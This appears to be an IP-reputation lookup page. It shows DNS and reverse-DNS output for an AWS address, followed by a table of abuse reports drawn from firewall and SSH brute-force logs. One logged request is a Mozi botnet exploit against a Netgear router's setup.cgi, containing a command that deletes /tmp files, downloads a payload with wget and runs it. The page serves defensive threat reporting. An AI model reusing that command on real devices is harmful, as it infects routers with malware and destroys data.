City: unknown
Region: unknown
Country: Germany
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 52.28.74.168
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 28626
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;52.28.74.168. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025030800 1800 900 604800 86400
;; Query time: 9 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sat Mar 08 15:02:21 CST 2025
;; MSG SIZE rcvd: 105168.74.28.52.in-addr.arpa domain name pointer ec2-52-28-74-168.eu-central-1.compute.amazonaws.com.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
168.74.28.52.in-addr.arpa name = ec2-52-28-74-168.eu-central-1.compute.amazonaws.com.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 89.248.168.176 | attack | May 26 09:31:03 debian-2gb-nbg1-2 kernel: \[12737063.540838\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=89.248.168.176 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=247 ID=54321 PROTO=TCP SPT=53707 DPT=40935 WINDOW=65535 RES=0x00 SYN URGP=0 |
2020-05-26 18:55:41 |
| 114.32.20.34 | attackspam | 20/5/26@03:31:03: FAIL: Alarm-Network address from=114.32.20.34 20/5/26@03:31:04: FAIL: Alarm-Network address from=114.32.20.34 ... |
2020-05-26 18:55:05 |
| 222.186.190.14 | attackbotsspam | May 26 12:33:15 minden010 sshd[13423]: Failed password for root from 222.186.190.14 port 42792 ssh2 May 26 12:33:18 minden010 sshd[13423]: Failed password for root from 222.186.190.14 port 42792 ssh2 May 26 12:33:20 minden010 sshd[13423]: Failed password for root from 222.186.190.14 port 42792 ssh2 ... |
2020-05-26 18:34:08 |
| 185.189.14.91 | attackspam | May 26 06:05:44 NPSTNNYC01T sshd[19344]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.189.14.91 May 26 06:05:46 NPSTNNYC01T sshd[19344]: Failed password for invalid user wayne from 185.189.14.91 port 54490 ssh2 May 26 06:09:40 NPSTNNYC01T sshd[19557]: Failed password for root from 185.189.14.91 port 55476 ssh2 ... |
2020-05-26 18:25:38 |
| 95.57.7.87 | attackspambots | Telnet/23 MH Probe, Scan, BF, Hack - |
2020-05-26 18:33:12 |
| 104.40.246.9 | attack | 2020-05-26T10:27:59.697614lavrinenko.info sshd[2297]: Failed password for invalid user backup from 104.40.246.9 port 46582 ssh2 2020-05-26T10:31:20.741473lavrinenko.info sshd[2454]: Invalid user opher from 104.40.246.9 port 49954 2020-05-26T10:31:20.750830lavrinenko.info sshd[2454]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=104.40.246.9 2020-05-26T10:31:20.741473lavrinenko.info sshd[2454]: Invalid user opher from 104.40.246.9 port 49954 2020-05-26T10:31:22.423238lavrinenko.info sshd[2454]: Failed password for invalid user opher from 104.40.246.9 port 49954 ssh2 ... |
2020-05-26 18:34:59 |
| 83.209.248.201 | attackbotsspam | Telnet/23 MH Probe, Scan, BF, Hack - |
2020-05-26 18:55:56 |
| 59.93.92.63 | attackbots | 20/5/26@05:43:31: FAIL: Alarm-Network address from=59.93.92.63 ... |
2020-05-26 18:26:11 |
| 14.215.176.156 | attackbots | ICMP MH Probe, Scan /Distributed - |
2020-05-26 18:36:28 |
| 171.237.210.166 | attackspam | Unauthorized connection attempt from IP address 171.237.210.166 on Port 445(SMB) |
2020-05-26 18:23:40 |
| 171.95.90.171 | attackbots | 171.95.90.171:23135 - - [26/May/2020:08:12:23 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 294 |
2020-05-26 18:30:33 |
| 145.239.92.211 | attackspam | 5x Failed Password |
2020-05-26 18:38:38 |
| 52.84.64.129 | attackbotsspam | Randomnumbers.cloudfront.net Attempted to log into news with no prompting from me. The message read “News wants to log in using d3ltcs8dr69ei6.cloudfront.net.This allows the app and. website to share information about you. I have never encountered anything like this. I did not know”cloudfronts could automatically log into your device. |
2020-05-26 18:22:33 |
| 106.13.173.161 | attackbots | May 26 09:27:59 v22019038103785759 sshd\[22429\]: Invalid user telkom from 106.13.173.161 port 44410 May 26 09:27:59 v22019038103785759 sshd\[22429\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.173.161 May 26 09:28:01 v22019038103785759 sshd\[22429\]: Failed password for invalid user telkom from 106.13.173.161 port 44410 ssh2 May 26 09:31:08 v22019038103785759 sshd\[22648\]: Invalid user ubuntu from 106.13.173.161 port 52340 May 26 09:31:08 v22019038103785759 sshd\[22648\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.173.161 ... |
2020-05-26 18:49:01 |
| 137.97.79.77 | attackbots | Unauthorized connection attempt from IP address 137.97.79.77 on Port 445(SMB) |
2020-05-26 18:48:31 |